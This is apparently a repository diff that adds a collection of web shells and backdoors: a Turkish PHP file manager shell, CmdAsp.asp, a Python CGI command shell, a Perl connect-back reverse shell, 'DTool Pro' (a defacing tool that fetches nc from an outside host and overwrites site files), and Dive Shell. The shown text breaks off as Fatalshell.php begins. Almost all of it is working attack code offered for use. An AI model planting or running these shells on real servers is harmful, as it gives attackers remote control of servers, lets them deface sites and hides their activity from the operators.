} else {}
if(file_exists("C:\\")){
echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
} else {}
if (file_exists("D:\\")){
echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
} else {}
if (file_exists("E:\\")){
echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
} else {}
if (file_exists("F:\\")){
echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
} else {}
if (file_exists("G:\\")){
echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
} else {}
if (file_exists("H:\\")){
echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
} else {}
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>SERVER BYLGYLERY</b></font><br></center>";
echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
echo "<br>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>Y?LEMLER</b></font><br></center>";
echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Olu?tur</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Olu?tur</a></font></center>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<br>
<center>Tüm haklary sahibi MafiABoY'a aittir</center>";
?>

55
138shell/C/CmdAsp.asp.txt Normal file
View file

@ -0,0 +1,55 @@
<++ CmdAsp.asp ++>
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
<-- CmdAsp.asp -->

1127
138shell/C/Crystal.txt Normal file
View file

File diff suppressed because it is too large Load diff

2
138shell/C/CyberSpy5.Asp.txt Normal file
View file

File diff suppressed because one or more lines are too long

3595
138shell/C/c100.txt Normal file
View file

File diff suppressed because one or more lines are too long

3299
138shell/C/c2007.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

2735
138shell/C/c99(1).php.txt Normal file
View file

File diff suppressed because it is too large Load diff

2927
138shell/C/c99.txt Normal file
View file

File diff suppressed because it is too large Load diff

124
138shell/C/cgi-python.py.txt Normal file
View file

@ -0,0 +1,124 @@
#!/usr/bin/python
# 07-07-04
# v1.0.0
# cgi-shell.py
# A simple CGI that executes arbitrary shell commands.
# Copyright Michael Foord
# You are free to modify, use and relicense this code.
# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
# Use at your own risk !!!
# E-mail michael AT foord DOT me DOT uk
# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
"""
A simple CGI script to execute shell commands via CGI.
"""
################################################################
# Imports
try:
import cgitb; cgitb.enable()
except:
pass
import sys, cgi, os
sys.stderr = sys.stdout
from time import strftime
import traceback
from StringIO import StringIO
from traceback import print_exc
################################################################
# constants
fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
versionstring = 'Version 1.0.0 7th July 2004'
if os.environ.has_key("SCRIPT_NAME"):
scriptname = os.environ["SCRIPT_NAME"]
else:
scriptname = ""
METHOD = '"POST"'
################################################################
# Private functions and variables
def getform(valuelist, theform, notpresent=''):
"""This function, given a CGI form, extracts the data from it, based on
valuelist passed in. Any non-present values are set to '' - although this can be changed.
(e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
data = {}
for field in valuelist:
if not theform.has_key(field):
data[field] = notpresent
else:
if type(theform[field]) != type([]):
data[field] = theform[field].value
else:
values = map(lambda x: x.value, theform[field]) # allows for list type values
data[field] = values
return data
theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
<BODY><CENTER>
<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
<B><I>By Fuzzyman</B></I><BR>
"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'
theform = """<H2>Enter Command</H2>
<FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
<input name=cmd type=text><BR>
<input type=submit value="Submit"><BR>
</FORM><BR><BR>"""
bodyend = '</BODY></HTML>'
errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'
################################################################
# main body of the script
if __name__ == '__main__':
print "Content-type: text/html" # this is the header to the server
print # so is this blank line
form = cgi.FieldStorage()
data = getform(['cmd'],form)
thecmd = data['cmd']
print theformhead
print theform
if thecmd:
print '<HR><BR><BR>'
print '<B>Command : ', thecmd, '<BR><BR>'
print 'Result : <BR><BR>'
try:
child_stdin, child_stdout = os.popen2(thecmd)
child_stdin.close()
result = child_stdout.read()
child_stdout.close()
print result.replace('\n', '<BR>')
except Exception, e: # an error in executing the command
print errormess
f = StringIO()
print_exc(file=f)
a = f.getvalue().splitlines()
for line in a:
print line
print bodyend
"""
TODO/ISSUES
CHANGELOG
07-07-04 Version 1.0.0
A very basic system for executing shell commands.
I may expand it into a proper 'environment' with session persistence...
"""

61
138shell/C/connectback2.pl.txt Normal file
View file

@ -0,0 +1,61 @@
#!/usr/bin/perl
use IO::Socket;
#WwW.CoM Security Hackers
#coded bY: MasterKid
#We Are: MasterKid, AleXutz, FatMan & MiKuTuL
#Email: muzicteam2006@yahoo.com
#
#kid@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#kid@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

2927
138shell/C/ctt_sh.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

2927
138shell/C/ctt_sh.txt Normal file
View file

File diff suppressed because it is too large Load diff

1033
138shell/C/cybershell.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

1033
138shell/C/cybershell.txt Normal file
View file

File diff suppressed because it is too large Load diff

198
138shell/D/DTool Pro.txt Normal file
View file

@ -0,0 +1,198 @@
<?php
if(empty($chdir)) $chdir = @$_GET['chdir'];
if(empty($cmd)) $cmd = @$_GET['cmd'];
if(empty($fu)) $fu = @$_GET['fu'];
if(empty($list)) $list = @$_GET['list'];
if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));
//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 = explode(";",$boom['1'], 2);
$toDir = $boom2['0'];
if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir ..')!==false){
$cadaDir = array_reverse(explode("/",$chdir));
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
$toDir = str_replace($lastDir,"",$chdir);
if($toDir=="/")$chdir="";
}
else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
$cmdShow = $cmd;
//To keep the changes in the url, when using the 'GET' way to send php variables
if(empty($post)){
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
}
//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
$safe = @ini_get($safemode);
if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
$pro8 = "<i>PHP </i>".phpversion();
$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
//Turns the 'ls' command more usefull, showing it as it looks in the shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
else if($cmd=='ls') $cmd = "ls -F";
//If there are some '//' in the cmd, its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="focar();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
</script>
<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
<script>
function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
</script>
</td></tr></table><table><tr><td>
<?php
ob_start();
if(isset($chdir)) @chdir($chdir);
function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
function shell($what){echo(shell_exec($what));}
function popenn($what){
$handle=popen("$what", "r");
$out=@fread($handle, 2096);
echo $out;
@pclose($handle);
}
function execc($what){
exec("$what",$array_out);
$out=implode("\n",$array_out);
echo $out;
}
function procc($what){
//na sequencia: stdin, stdout, sterr
if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
$process = @proc_open("$what",$descpec,$pipes);
if (is_resource($process)) {
fwrite($pipes[0], "");
fclose($pipes[0]);
while(!feof($pipes[2])) {
$erro_retorno = fgets($pipes[2], 4096);
if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
}
fclose($pipes[2]);
while(!feof($pipes[1])) {
echo fgets($pipes[1], 4096);
}
fclose($pipes[1]);
$ok_p_fecha = @proc_close($process);
}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
}
$funE="function_exists";
if($safe){$fe="safemode";$feshow=$fe;}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
else {$fe="nofunction";$feshow=$fe;}
if($fu!="0" or !empty($fu)){
if($fu==1){$fe="passthru";$feshow=$fe;}
if($fu==2){$fe="system";$feshow=$fe;}
if($fu==3){$fe="execc";$feshow="exec";}
if($fu==4){$fe="popenn";$feshow="popen";}
if($fu==5){$fe="shell";$feshow="shell_exec";}
if($fu==6){$fe="procc";$feshow="proc_open";}
}
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="6">use proc_open()*new
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") @include($remote_addr."flist".$format_addr);
?>
</table>

187
138shell/D/Dive Shell 1.0 - Emperor Hacking Team.txt Normal file
View file

@ -0,0 +1,187 @@
<?php
/*Emperor Hacking TEAM */
session_start();
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) {
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_REQUEST['command']);
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
if ($regs[1][0] == '/') {
$new_dir = $regs[1];
} else {
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
chdir($_SESSION['cwd']);
$length = strcspn($_REQUEST['command'], " \t");
$token = substr($_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
?>
<head>
<title>Dive Shell - Emperor Hacking Team</title>
<link rel="stylesheet" href="Simshell.css" type="text/css" />
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
</head>
<body onload="init()" style="color: #00FF00; background-color: #000000">
<span style="background-color: #FFFFFF">
</body>
</body>
</html>
</span>
<p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
</font></p>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
<div style="width: 989; height: 456">
<p align="center"><b>
<font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
<input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
</font>
&nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea> </p>
<p class="prompt" align="center">
<b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b>
<input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
<p class="prompt" align="center">
<b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
<p class="prompt" align="center">
<font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
&nbsp;</font></p>
</div>
</form>
<p class="prompt" align="center">
<b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
</b></p>
</html>

2026
138shell/D/Dx.php.txt Normal file
View file

File diff suppressed because one or more lines are too long

2026
138shell/D/Dx.txt Normal file
View file

File diff suppressed because one or more lines are too long

2029
138shell/D/DxShell_hk.php.txt Normal file
View file

File diff suppressed because one or more lines are too long

1273
138shell/D/dC3 Security Crew Shell PRiV.txt Normal file
View file

File diff suppressed because it is too large Load diff

57
138shell/E/EFSO_2.asp.txt Normal file
View file

File diff suppressed because one or more lines are too long

2324
138shell/E/Elmali Seker.asp.txt Normal file
View file

File diff suppressed because it is too large Load diff

2324
138shell/E/elmaliseker.asp.txt Normal file
View file

File diff suppressed because it is too large Load diff

283
138shell/F/Fatalshell.php.txt Normal file
View file

@ -0,0 +1,283 @@
<?php
session_start();
error_reporting(E_ALL ^ E_NOTICE);
